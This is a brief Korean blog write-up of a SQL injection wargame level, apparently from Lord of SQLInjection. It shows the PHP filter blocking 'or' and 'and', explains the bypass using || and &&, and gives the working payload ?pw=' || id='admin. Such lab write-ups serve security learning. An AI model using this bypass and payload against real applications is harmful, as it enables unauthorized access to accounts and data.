문제다.
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
이번에는 or, and가 필터링 되어있다.
어떻게 우회할 것인지 생각을 해보면
아래처럼 우회를 할 수 있다.
and -> &&
or -> ||
그럼 쿼리를 짜보자.
?pw=' || id='admin
짠 쿼리를 보내주자.
클리어다.
'Write Up > los' 카테고리의 다른 글
| los troll[8번] (0) | 2020.01.05 |
|---|---|
| los orge[7번] (0) | 2020.01.04 |
| los wolfman[5번] (0) | 2020.01.04 |
| los orc[4번] (0) | 2020.01.01 |
| los goblin[3번] (0) | 2019.12.27 |
